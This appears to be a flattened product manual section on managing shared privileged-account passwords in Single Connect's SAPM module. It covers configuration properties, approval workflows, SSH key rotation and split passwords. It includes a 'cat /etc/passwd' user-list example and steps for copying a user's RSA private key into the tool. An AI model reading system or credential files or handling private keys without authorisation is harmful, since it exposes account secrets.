4.1 Managing SAPM (Shared Accounts Password Management) Accounts

adding sapm configuration authorized users can create sapm accounts to add an account log in to single connect gui navigate to sapm management > sapm management open the configuration tab enter in name, strategy and description and save click the search button to see saved configurations click the option drop down menu and select show properties type related parameters and save sapm configuration property key description pool value allow\ seen by multiple user when it is set “true”, sapm password can be seen by other users that are in same user group as default, the sapm password can be seen only by user who get password last true/false change password after session login when set as “true”, sapm password will be changed just after an rdp session has started by the singleconnect session manager using this sapm account as default, the sapm password is not changed after being used by the session manager true/false change password command template change password command set device type specific ex for a cisco device; en\n${superpassword}\nconf t\nline con 0\npassword ${newpassword}\nline vty 0 4\npassword ${newpassword}\nline vty 5 15\npassword ${newpassword}\nenable secret ${newpassword}\nend\nwr me\nexit change password failure pattern when “change password” execution failed, output message can be set device type specific ex for cisco device; % invalid input detected change password only at change period when set as “true”, no duration information is requested from the user, only comments will be requested, the password will not be changed after checkout, others will be able to checkout the same password until next periodic change as default, the duration is requested from the user and password is changed after the checkout true/false change password script template the expect script which is used for changing the password expect script change password success pattern when “change password” execution is successful, output message can be set device type specific change password with domain when it is set “true”, domain name is included in the command sent to ad servers for ad user password changes as default, it is false, and the domain name is not included in the command sent to ad servers for ad user password change true/false change period in day period to change password (unit\ day) if “change period (day)”is not set at sapm accounts tab, “change period in day” parameter value at configuration tab is used for changing password if both “change period” at sapm account and “change period in day” parameter value at configuration are not set, error is occurred when changing password integer (unit\ day) change period in minute on fail period to attempt to change password again when periodic password change is failed integer (unit\ minutes) check new\ users with super user discovering new users (that is created in the sapm device) with administrative user true/false check password command template command set for checking password validity device type specific check password success pattern when “check password” execution is successful, output message can be set check password validation enable/disable password validity check true/false check password with super user checking password validity with administrative user true/false connection timeout timeout duration for connection integer (unit\ second) database driver database driver to manage password for database oracle/postgresql/mssqlserver/mysql/cassandra driver oracle jdbc driver oracledriver/org postgresql driver/me=testdb com microsoft sqlserver jdbc sqlserverdriver/ com mysql jdbc driver/org apache cassandra cql jdbc cassandradriver delete list script template the expect script which is used for deleting the users expect script delete user command template command set for deleting user device type specific execute post command with super user executing "post command" that is defined in a property with administrative user true/false file path when "file" is chosen as strategy, target file path must be defined to change password both "file regex to match" and "file regex to replace" parameters are required device type specific file regex to match define a regex to match password field both "file path" and "file regex to replace" parameters are required file regex to match when the "file regex to match" matches password field, replace it with this property value both "file regex to match" and "file path" parameters are required http change password body password change body for http request http change password headers password change headers for http request http change password method password change method for http request http change password url password change url for http request http check password body password check body for http request http check password headers password check headers for http request http check password method password check method for http request http check password url password check url for http request http delete user body user deleting body for http request http delete user headers user deleting header for http request http delete user method user deleting method for http request http delete user success pattern when “deleting user” execution is successful, output message can be set for http request http delete user url user deleting url for http request http user list body user list body for http request http user list headers user list headers for http request http user list method user list method for http request http user list url user list url for http request ldap base dn basic ldap domain ex ou=testuser,dc=kron,dc=local ldap domain domain name which will be included in the command sent to ad servers for ad user password changes, when change password with domain property is set as “true” domain name ldap ignore certificate ignore certificate for ldap/ad setting true/false ldap password attribute name configuration property for ldap/ad if there is no exception it is "userpassword" ldap username dn template configuration property for ldap/ad cn=${username},dc=example,dc=com new\ password encryption key define key when "new\ password encryption method" is chosen as aes device specific new\ password encryption method clear/md5/aes/unicode enclosed in double quotes new\ user exception list don't list these users at new user list new\ user found action to enable some functionality when new user is found log/nothing/delete/log and delete password strength symbol chars to define symbol char pool value custom ex !"#$%&'() +, / ;\<?@\[\\]^ `{|} password strength lowercase count exact number for lowercase which must be included in password integer password strength number count exact number for lowercase which must be included in password integer password strength symbol count exact number for symbol which must be included in password integer password strength uppercase count exact number for uppercase which must be included in password integer post command after successfully password changed, multiple commands separated by \n can be written to execute on the server device type specific post command failure pattern if the pattern is found in command results of the “post command”, the command is accepted as "failed" then, command execution is stopped, and remaining commands are not executed device type specific post command stop on fail when the property value is set as “true”, if any failure is occurred, remaining commands are not executed default value is “false” true/false skip password validation after change for tacacs device it must be true true/false ssh port define port number when strategy value is "ssh" device type specific super password password of super user who has administration grant for other users the value must be set when one of " with superuser" property is set device specific super username username of super user who has administration grant for other users the value must be set when one of " with superuser" property is set device specific target url template destination ad/ldap url for active directory user device specific user list command command to pull user list ex cat /etc/passwd (objectclass=user) user list script template the expect script which is used for checking the new users expect script username parser pattern to find usernames after users listed device type specific ex ( ?) duplicating sapm configuration users can duplicate an sapm configuration with all properties to duplicate an sapm configuration log in to single connect gui navigate to sapm management > sapm management open the configuration tab click the search button to see saved configurations click the option drop down menu and select duplicate type the new name, select strategy and save after saving, a duplicate configuration will be created users can edit the properties for the new configuration later configuration to show password to multiple users if an sapm password is to be seen by the same user group at the same time, the "allow\ seen by multiple user" property must be set configuration to execute commands after changing password after changing passwords, executing some commands may be need for these commands to be executed, the following properties must be set in ssh and smb strategy post command after successfully changing the password, multiple commands separated by “\n” can be written to execute on the server post command failure pattern if the pattern is found in the command results of the “post command”, command execution is stopped and the remaining commands are not executed post command stop on fail when the property value is set as “true”, if any failure occurs, the remaining commands are not executed default value is “false” execute post command with super user when the property value is set as “true”, commands are executed by the superuser default value is “false” note last command in the “post command” property must be a logout command for an “ssh” strategy example for windows example for linux post command net stop dnscache\nnet start dnscache post command systemctl restart rsyslog\nlogout post command failure pattern invalid post command failure pattern failed post command stop on fail false post command stop on fail true execute post command with super user true execute post command with super user true configuration to reminder for changing password a reminder can be set before the password change date arrives to set a “password change reminder day” follow the steps below; log in to the single connect gui navigate to sapm management > sapm management open the configuration tab click the search button to see saved configurations click the option drop down menu of the related configuration and select show properties set the note the reminder mail is sent to “sapmmaillist” that is defined in the device group properties adding accounts in sapm authorized users can create sapm accounts to add an account log in to the single connect gui navigate to sapm management > sapm management open the sapm accounts tab enter the host, user name, password, change period and configuration name save note if “change period (day)”is not set at the sapm accounts tab, then the “change period in day” parameter value in the configuration tab is used for changing the password if both “change period” for the sapm account and the “change period in day” parameter value are not set at configuration, an error occurs when changing the password adding cluster accounts in sapm firstly, an sapm account is defined for an active cluster node then, other nodes are defined as below; log in to the single connect gui navigate to sapm management > sapm management open the sapm accounts tab select the defined active node sapm account and click the “options” button of the account select the “create identical sapm account” option and enter the other node ip address of the cluster note in this “adding” step, connection to device is not established password of the first sapm account of the cluster is assigned automatically to the identical accounts note proper regular expression is defined for the "change password failure pattern" property in sapm configuration to prevent password change on passive nodes to search identical accounts log in to the single connect gui navigate to sapm management > sapm management section open the sapm accounts tab select an sapm account and click the “options” button of the account select the “show identical sapm account” option ssh key rotation by sapm ssh keys can be changed by sapm module periodically to add an ssh key log in to the single connect gui navigate to sapm management > sapm management open the sapm accounts tab enter host, change period and username select “linux ssh key” as configuration this changes the password field to “rsa private key” field make an ssh session towards the target device and copy the contents of /home/\<username>/ ssh/id rsa (or any other path that includes the rsa private key for the user) file paste into “rsa private key” field click “save” confirm the dialog box the sapm account will be saved and listed in the sapm accounts part from this moment on, the ssh key will be changed periodically checking out and resetting ssh key works just like the normal sapm accounts adding auto import rules if there are a lot of devices that have the same username and password, the function can be used to add sapm account log in to the singleconnect web gui navigate to sapm management > sapm management open the auto import rules tab enter the rule name, device group, element type, sapm configuration, sapm username, password, and change period save note to change the number of threads that are running the sapm auto import jobs, the “ sapm job password change thread count” parameter should be changed in administration > system config man page the default value is 5 adding permissions to sapm accounts different authorization levels can be defined to sapm accounts to set permissions to accounts; log in to the single connect web gui navigate to sapm management > sapm management open the sapm accounts tab select the account to set permissions, click the options button, and then click the permissions button select the user group and permission save permission types read only these users only have the authority to see the sapm password full control users who have full control permission are admins of this sapm account these users have full authority such as resetting, changing the password, and giving permission to users read only first part these users have only authority to see the first half of the sapm password read only second part these users have only authority to see the second half of the sapm password one user can be a member of multiple user groups with different rights in this case following order will be used full control > read only > read only first part > read only second part this means that if a user has full control and read only rights, they will have the full control right which is superior if they have the read only first part and read only second part rights, they will get the first part of the password create a one time password log in to the single connect web gui navigate to sapm management > sapm management open the sapm accounts tab select the user who will see the one time password specify the reason for accessing the password (optional) from the user options drop down menu, and select show password a pop up appears to choose the expiration time change account password manually log in to the single connect web gui navigate to sapm management > sapm management open the sapm accounts tab select the user for the password to be changed from the user options drop down menu, click update password which will open the update password window update the password by entering the current and new password, then click update reset account password log in to the single connect web gui navigate to sapm management > sapm management open the sapm accounts tab select the account to reset the password of from the account options drop down menu select reset password confirm the operation from the dialog box by clicking “yes” password is reset checking new users sapm can check new users in a server after adding at least one sapm account in the server to do this log in to the single connect web gui navigate to sapm management > sapm management click the search button after the accounts are listed, click options button for one of the accounts click “check new users” in the menu sapm will check the users and a pop up will inform the user about the process after that, the new user list can be viewed open the new users log tab fill in the fields to filter click the search button importing new users to sapm new users can be imported to sapm using new users log screen to do this complete checking new users steps described above open new users log tab fill the search fields and click search select the users to be imported by clicking selection boxes (the users that will be imported together should have the same password) click import to sapm button fill configuration, change period and password fields and save deleting new users new users can be deleted using new users log screen to do this complete checking new users steps described above open new users log tab fill the search fields and click search select the users to be deleted by clicking selection boxes click delete button display password check log log in to the single connect web gui navigate to sapm management > sapm management open the password check log tab fill in the fields to filter click the search button display password change log log in to the single connect web gui navigate to sapm management > sapm management open the password change log tab fill in the fields to filter click the search button display password history log log in to the single connect web gui navigate to sapm management open the sapm accounts tab select the account to see the password history of click the options button and select show old passwords sapm dashboard the sapm dashboard shows a graphical report of validity and the change status of the password of sapm accounts in a parent device group managers can only access reports of device groups which they are authorized to see log in to the single connect web gui navigate to sapm management > sapm accounts open the sapm dashboard tab choose the parent group to show the graphical report for managing passwords in a file the single connect sapm module can change passwords in a specific file log in to the single connect web gui navigate to device management > element type create a new element type or edit one of the existing types set the element properties described below, then create an sapm account sapm password change strategy sapm change password with super user sapm super username sapm super password sapm file path sapm file regex to match sapm file regex to replace sapm notifications settings sapm mail list notifications log in to the single connect web gui navigate to device management > device groups right click the device group containing the device of interest and select “show properties” 4 on the “device group properties information” screen, select the “sapmmaillist” as the “property key” and enter the e mail information when a user retrieves a password for an sapm account, “sapmmaillist” is notified if an error occurs during resetting the password of an sapm account, a "password reset failed" e mail is sent to “sapmmaillist” if the password cannot be verified while checking the password of an sapm account periodically, a "password check problem" e mail is sent to “sapmmaillist” if a new user is detected on a device that has an sapm account, a "new user(s) found" e mail is sent to “sapmmaillist” (the new user detection feature depends on the configuration there for it can be disabled for specific accounts ) password retrieval approval notifications log in to the single connect web gui navigate to policy control > portal functions open the function group definition tab enter the function group name then select function as, open the “realm definition” tab set the realm for the user group and the sapm approval function when a user (who retrieves a password with only administrator approval) requests to retrieve the sapm password, a " sapm password approval request " e mail is sent to the below list user groups that has the “single connect sapm admin” and the “single connect sapm network admin” portal functions single connect sapm admin grants rights to manage all sapm accounts and view all logs single connect sapm network admin grants rights to manage and view all accounts of devices defined to the user user groups with the full control permission for the sapm account that requested the approval password retrieval second level approval notifications the users whose password retrieval requests need two level approvals should have an “sapm second level approval requirement” function group defined in their portal functions realm to do so, these steps should be followed log in to the single connect web gui as an admin navigate to policy control > portal functions set the realm between the “sapm second level approval requirement” function group and the user group of the user that will need the second level approval when a user, who retrieves a password with two level approval, requests to retrieve the sapm password, "sapm password approval request" e mail is sent to the list below user groups that have “single connect sapm admin” and “single connect sapm network admin” portal functions single connect sapm admin grants rights to manage all sapm accounts and view all logs single connect sapm network admin grants rights to manage and view all accounts of devices defined to the user in device group realms user groups with the full control permission for the sapm account that requested the approval so, the following steps should be followed log in to the single connect web gui as an admin navigate to policy control > portal functions set the realm between the “sapm admin” function group and the user group of the user that will be able to give “first approval” for all password retrieval requests and/or set the realm between the “sapm network admin” function group and the user group of the user that will be able to give “first approval” for all password retrieval requests coming for the devices in their device group realms only if a user from these lists approve the initial request, an "sapm password approval request" e mail is sent to the second level approvers, which are provided in the list below user groups that have the “single connect sapm secondlevel admin” and “single connect sapm network admin” portal functions single connect sapm secondlevel admin grants rights to give second level approval for all sapm accounts and view all logs single connect sapm secondlevel network admin grants rights to give second level approval for all accounts of devices defined to the user device group realms so, the following steps should be followed log in to the single connect web gui as an admin navigate to policy control > portal functions set the realm between the “sapm second level admin” function group and the user group of the user that will be able to give second approval for all password retrieval requests and/or set the realm between the “sapm network admin” function group and the user group of the user that will be able to give second level approval for all password retrieval requests coming for the devices in their device group realms only if a user from these lists approves the second level request, the requester receives an e mail and can proceed to password checkout if any of the authorizers deny the request, informational e mails are sent to all participants, and the request gets terminated future date reservation password retrieval for an sapm account can be reserved for a future date these steps should be followed for future date reservation log in to the single connect web gui navigate to sapm management > sapm management open the sapm accounts tab click the “search” button to search for the accounts click the “options” button for the account whose password will be reserved select “password reservation” from the drop down menu from the pop up menu, specify start time, reservation duration, reminder, comments, and first part and second part users, if “split password” is applied for the account click reserve reservation will appear in the search results if one or two level approval is applied for the user, then the approvers should approve reservation before the user gets the password if all approvals are completed, the user gets a reminder e mail at reminder time and gets the password e mail at reservation time the past and future reservations can be searched in the “reservation” tab in order to delete any of them click the “options” button near the reservation select “delete reservation” note password reservation works only when the sapm passwordreservation job is triggered periodically split password feature in order to secure the two part approval process, the password of an sapm account can be split in to two and be retrieved by different users after placing the users in different user groups, these steps should be followed log in to the single connect web gui as an admin user navigate to device management > device groups open the “device group realms” tab create the device group realm between the user groups and the device group containing the target device navigate to sapm management > sapm management search for the accounts click the “options” button for the sapm account select “permissions” to open the permissions pop up window define the “ read only first part ” permission type for the user group that will receive the first part of the password define the “ read only second part ” permission type for the user group that will receive the second part of the password close the permissions pop up window navigate to policy control > portal functions create a portal realm with the “sapm management” function group for both user groups after completing these steps, the users log in and retrieve their parts of the password from the sapm management section like normal password retrieval they can log in to the target system using the sapm username and the password combined in the correct order if one or two level approval is applied for the user, the user will get the related part in the e mail when the approval process is completed